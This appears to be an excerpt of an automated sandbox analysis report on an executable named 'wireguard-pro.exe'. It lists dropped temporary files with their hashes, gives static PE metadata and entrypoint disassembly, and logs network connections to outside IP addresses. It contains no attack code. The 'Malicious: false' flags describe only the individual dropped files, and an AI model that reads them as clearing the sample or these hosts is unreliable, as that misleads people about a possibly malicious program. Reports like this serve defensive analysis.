Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7BFB9DCD722868B7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8B2795E8AA38FD88.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09156622609833596
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOFrVAOSSPFkRvEqgaYXNS04bcVky6lE:2F0i8n0itFzDHFFrqO95qS9mE
MD5:	5756EDD95D625E9F3F3503BAAD85A8BB
SHA1:	6E341BB5B4CD321719921AD8DF7CA3F57C3D7A71
SHA-256:	DFB1879E6C566DDF72181911755EEF8F53A81530A327456C1B3EA9491D47BBCB
SHA-512:	8BAF60CBBA879BA3817A116FD4A3D235304616041C9B28B6F376D206CAAD0AEFD995391290B4E3969F35D14B91ECC1317D0EBD61DBCC4E41B7D79169AFF34B12
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8BC79B499724309B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.424379631023187
Encrypted:	false
SSDEEP:	48:ZR8PhSuRc06WX4iFT5pgaoXqQxGg7S5okqSIR78D:+hS1yFTo/XqQxGC1BK
MD5:	A870959CB697B15B8BE46A803CD8B7FD
SHA1:	3B8BB9FD538F816BEC32F8A3A25F3F3AC5585E54
SHA-256:	FE33BB36DCB40465344921EE64AE8DDCB249B8725C5FEA24A27AC0E024CF26EB
SHA-512:	2F1EE4F90A5BE89184FD8275A415DFD2D294D1784B691AA9237B19CD98A688D4ED36E11211C9B95F50E51A189DB94E62C80C4FC63D432A25D130910D1D5A08E2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB1F33FAFE7A008C1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1511419018185869
Encrypted:	false
SSDEEP:	48:Nnr6u1O+xFX4zT5ngaoXqQxGg7S5okqSIR78D:h6OwTm/XqQxGC1BK
MD5:	820B4BA461743698121835FE3400025E
SHA1:	2535EF824BE47B3D23B7F2C423D82019383C2F75
SHA-256:	383420E9A0F2DAC8C32219BC891F18FD494A539E78C91C595BABCEC92434AB8D
SHA-512:	2E265675E3D3EFE8498D46A6A44C39F08B5A3C211740909C6342D501889984FCA2FC1E5D1DA5363D55E259D91392BD3DDBB4BE64FD6096C2BCD62CFF30F6277D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC5CB4060F77FE854.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.424379631023187
Encrypted:	false
SSDEEP:	48:ZR8PhSuRc06WX4iFT5pgaoXqQxGg7S5okqSIR78D:+hS1yFTo/XqQxGC1BK
MD5:	A870959CB697B15B8BE46A803CD8B7FD
SHA1:	3B8BB9FD538F816BEC32F8A3A25F3F3AC5585E54
SHA-256:	FE33BB36DCB40465344921EE64AE8DDCB249B8725C5FEA24A27AC0E024CF26EB
SHA-512:	2F1EE4F90A5BE89184FD8275A415DFD2D294D1784B691AA9237B19CD98A688D4ED36E11211C9B95F50E51A189DB94E62C80C4FC63D432A25D130910D1D5A08E2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC9E48EAD6A4E062F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD68E1F3A04FF7921.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE4DF0ACBB42C8F3A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF39E47138947295A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1511419018185869
Encrypted:	false
SSDEEP:	48:Nnr6u1O+xFX4zT5ngaoXqQxGg7S5okqSIR78D:h6OwTm/XqQxGC1BK
MD5:	820B4BA461743698121835FE3400025E
SHA1:	2535EF824BE47B3D23B7F2C423D82019383C2F75
SHA-256:	383420E9A0F2DAC8C32219BC891F18FD494A539E78C91C595BABCEC92434AB8D
SHA-512:	2E265675E3D3EFE8498D46A6A44C39F08B5A3C211740909C6342D501889984FCA2FC1E5D1DA5363D55E259D91392BD3DDBB4BE64FD6096C2BCD62CFF30F6277D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\wireguard-pro.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.366342641710442
Encrypted:	false
SSDEEP:	12288:9oT0Th31T9p6HTSPWt9Wvr+47Zb1VX11p/4dd/DYZ58yHlqrR1sU:6T0Th31T9pyTSPjd7c
MD5:	6CE6E0DE64685AD708C107DFA2E94E27
SHA1:	DE51D76CA67CB76C277697155F6FD99FEB2660D7
SHA-256:	E740030B1F1BF23DF7293A62D795BFC169577FAF128822723F4E8E8A2E33FE9C
SHA-512:	2460EFB316D9BE80277FFDCC04E45A50E17FE8A01E6BBA34B5A5208745B91D4F8AD72EEE0FC8991FBF995425B8F7CADB9B8045B2BFBDA4948998D37BF9C4CAD4
Malicious:	false
Preview:	regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmzTN.9................................................................................................................................................................................................................................................................................................................................................aGO........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Users\user\Desktop\wireguard-pro.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.3086781442975277
Encrypted:	false
SSDEEP:	768:unYFCjgEY1/TTkyOeOvv9eNJQq0n18vJ7Qn6epI/ld8c:5CjxYKeeeEvsg
MD5:	A0D141BC5B0506EAC75E18C66FEF6ABF
SHA1:	A426E86FCCFAE5F2CFE137F2BD4192B7B682E641
SHA-256:	0D3E91CF9AC219AD7036A46A5DB5CDC07C06F93F9D58B19EBE41B3359B70DA0D
SHA-512:	789125038682621D2C0EA63176C311B0878CD257658831DEDD54A8420367339D0519DE9FDE48C5EBC9D66472C8CC559AE22534CAC22ECF49E595A8F494BAFAA9
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmzTN.9................................................................................................................................................................................................................................................................................................................................................aGOHvLE.N......Z..................a......................................hbin................p.\..,..........nk,..!...,.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...O.`...... ........................... .......Z.......................Root........lf......Root....nk .Ji..v................................... ..............................DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.5617018529643985
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	wireguard-pro.exe
File size:	739'328 bytes
MD5:	c3fdabfa7e016aa9b2cacbb5fc9860a8
SHA1:	70e5f0dfb1a1dc4d6668f6333ecbf83aa49d13bf
SHA256:	313897bcfd2d0d82e6f41eef6161976f84c602ebed626ee29feaec6ee36f2c94
SHA512:	27a44617e0df5faa6051a968151206373b2d961c647c9bf2ac3888308e92b2a2d78511648b6a70b72602a69794f4234ad23c79c5b338061763faaf96987d1562
SSDEEP:	12288:tNTeVyTF63SThrGvvmfjje59IUwnZH0h:PB43SThy07
TLSH:	E0F4F8212DEB509DB3A3ABA95FC8F8FF896AF673160E70B5306107468722D81CD91735
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i>............"...0..@..........~_... ...`....@.. ...............................s....@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4b5f7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
sbb byte ptr [eax], al
add byte ptr [eax], al
sbb byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5f24	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x248	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb3f84	0xb4000	False	0.2604342990451389	data	3.559844205845628	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x248	0x400	False	0.3037109375	data	3.526286411687027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xb6058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2023 22:34:57.726037979 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:57.726095915 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:57.726186991 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:57.729203939 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:57.729224920 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:57.954190016 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:57.954298973 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:57.959007025 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:57.959029913 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:57.959547043 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.011920929 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.119671106 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.166465044 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.220756054 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.220927000 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.221142054 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.223093033 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.223093033 CEST	49775	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.223159075 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.223196030 CEST	443	49775	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.228153944 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.228230953 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.228326082 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.228779078 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.228797913 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.389252901 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:34:58.439390898 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.439861059 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.439889908 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.441184998 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.441191912 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.599009991 CEST	80	49777	132.226.247.73	192.168.2.4
Oct 3, 2023 22:34:58.599422932 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:34:58.600563049 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:34:58.738168001 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.738203049 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.738224983 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.738352060 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.738373041 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.738533974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.738960028 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.738982916 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.739029884 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.739039898 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.739070892 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.739095926 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.809784889 CEST	80	49777	132.226.247.73	192.168.2.4
Oct 3, 2023 22:34:58.811151028 CEST	80	49777	132.226.247.73	192.168.2.4
Oct 3, 2023 22:34:58.837891102 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.837920904 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.838004112 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.838044882 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.838077068 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.838114977 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.838690996 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.838712931 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.838766098 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.838778019 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.838814974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.838835001 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.855577946 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:34:58.878655910 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.878684998 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.878978968 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.879040003 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.879125118 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.939224005 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.939253092 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.939671993 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.939732075 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.939837933 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.940123081 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.940148115 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.940498114 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.940557957 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.940645933 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.941205978 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.941231012 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.941282988 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.941297054 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.941334009 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.941355944 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.942306042 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.942328930 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.942399025 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.942410946 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.942476034 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.944348097 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.944365978 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.944489956 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.944502115 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.944566965 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.979077101 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979096889 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979254007 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.979314089 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979505062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.979684114 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979702950 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979892969 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:58.979906082 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:58.979976892 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.038907051 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.038943052 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.039097071 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.039156914 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.039233923 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.039855957 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.039875984 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.039940119 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.039952993 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.039988995 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.040026903 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.040642023 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.040664911 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.040723085 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.040734053 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.040785074 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.040806055 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.041702986 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.041722059 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.041795015 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.041807890 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.041867971 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.042499065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.042519093 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.042571068 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.042582035 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.042629004 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.042655945 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.043617010 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.043643951 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.043802977 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.043817043 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.043889046 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.044738054 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.044759035 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.044840097 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.044852018 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.044884920 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.044910908 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.046312094 CEST	443	49776	136.144.57.121	192.168.2.4
